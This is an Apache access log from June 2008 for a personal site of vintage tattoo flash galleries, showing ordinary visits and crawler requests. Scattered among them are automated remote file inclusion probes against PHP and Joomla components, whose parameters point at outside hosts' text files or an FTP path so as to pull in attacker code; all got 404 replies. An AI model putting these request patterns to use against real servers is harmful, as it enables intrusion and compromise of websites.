71.143.5.157 - - [12/Jun/2008:14:18:53 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:53 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:53 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:55 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:19:54 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:19:54 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:19:55 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:19:55 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
202.164.225.11 - - [12/Jun/2008:14:27:24 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
202.164.225.11 - - [12/Jun/2008:14:27:25 -0500] "GET //skin/zero_vote/error.php?dir=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:14:33:50 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.lernservicecenter.de/lsc/administrator/components/com_rss/ini/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:14:33:51 -0500] "GET //skin/zero_vote/error.php?dir=http://www.lernservicecenter.de/lsc/administrator/components/com_rss/ini/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
64.47.96.110 - - [12/Jun/2008:14:34:15 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?hl=en&q=vintage+flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:16 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:19 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:25 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:25 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:25 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:26 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:26 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:26 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:26 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:27 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:27 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:28 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:28 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:36 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:36 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:36 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:37 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:37 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:38 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:38 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:38 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:38 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:39 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:39 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:52 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:53 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:53 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:53 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:53 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:54 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:54 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:54 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:54 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:55 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:34:55 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:35:02 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:35:03 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:35:03 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
64.47.96.110 - - [12/Jun/2008:14:35:03 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
83.222.27.201 - - [12/Jun/2008:14:38:14 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
83.222.27.201 - - [12/Jun/2008:14:38:14 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
74.6.22.89 - - [12/Jun/2008:14:40:58 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.89 - - [12/Jun/2008:14:40:58 -0500] "GET /logs/access_log.1170201600 HTTP/1.0" 200 208226 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.25.182.178 - - [12/Jun/2008:14:41:03 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
72.25.182.178 - - [12/Jun/2008:14:41:03 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
72.25.182.178 - - [12/Jun/2008:14:41:03 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
72.25.182.178 - - [12/Jun/2008:14:41:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
62.2.100.138 - - [12/Jun/2008:14:42:47 -0500] "GET /logs///errors.php?error=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:14:42:51 -0500] "GET ///errors.php?error=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
194.112.190.5 - - [12/Jun/2008:14:48:15 -0500] "GET //modules/postguestbook/styleshttp://www.ciprof.it/readme.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
194.112.190.5 - - [12/Jun/2008:14:48:17 -0500] "GET /logs//modules/postguestbook/styleshttp://www.ciprof.it/readme.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
194.112.190.5 - - [12/Jun/2008:14:54:23 -0500] "GET /logs/send_reminders.php?includedir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
194.112.190.5 - - [12/Jun/2008:14:54:25 -0500] "GET /send_reminders.php?includedir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
72.55.153.109 - - [12/Jun/2008:14:54:50 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
72.55.153.109 - - [12/Jun/2008:14:54:50 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
194.112.190.5 - - [12/Jun/2008:14:55:21 -0500] "GET /logs/access_log.1208649600/send_reminders.php?includedir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
203.22.204.167 - - [12/Jun/2008:14:55:55 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://zeroboss.helloweb.eu/zip/idasc.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
203.22.204.167 - - [12/Jun/2008:14:55:55 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://zeroboss.helloweb.eu/zip/idasc.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
74.6.22.89 - - [12/Jun/2008:15:10:20 -0500] "GET /logs/access_log.1161129600 HTTP/1.0" 200 299040 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.29.62 - - [12/Jun/2008:15:11:33 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.217 - - [12/Jun/2008:15:11:33 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.189.9.11 - - [12/Jun/2008:15:14:40 -0500] "GET /logs/upgrade.php?admindir=http://www.joerg-krug.de/vnc/test.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
213.189.9.11 - - [12/Jun/2008:15:14:43 -0500] "GET /upgrade.php?admindir=http://www.joerg-krug.de/vnc/test.txt?? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
65.55.208.135 - - [12/Jun/2008:15:16:43 -0500] "GET /logs/access_log.1186531200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [12/Jun/2008:15:16:44 -0500] "GET /logs/access_log.1188086400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.189.9.11 - - [12/Jun/2008:15:20:26 -0500] "GET /logs/upgrade.php?admindir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
213.189.9.11 - - [12/Jun/2008:15:20:27 -0500] "GET /upgrade.php?admindir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
213.189.9.11 - - [12/Jun/2008:15:25:03 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.joerg-krug.de/vnc/test.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
213.189.9.11 - - [12/Jun/2008:15:25:08 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.joerg-krug.de/vnc/test.txt?? HTTP/1.1" 404 317 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
72.29.81.233 - - [12/Jun/2008:15:30:35 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 356 "-""libwww-perl/5.811"
72.29.81.233 - - [12/Jun/2008:15:30:36 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 351 "-""libwww-perl/5.811"
65.214.44.28 - - [12/Jun/2008:15:31:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [12/Jun/2008:15:31:37 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:37 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:37 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:37 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:37 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:37 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:37 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:38 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:38 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:38 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [12/Jun/2008:15:31:38 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
71.100.40.240 - - [12/Jun/2008:15:44:43 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.yahoo.com/search?ei=utf-8&fr=slv8-hptb7&p=1950%20tattoo%20flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:44:43 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:44:43 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:44:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:44:59 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:44:59 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:44:59 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
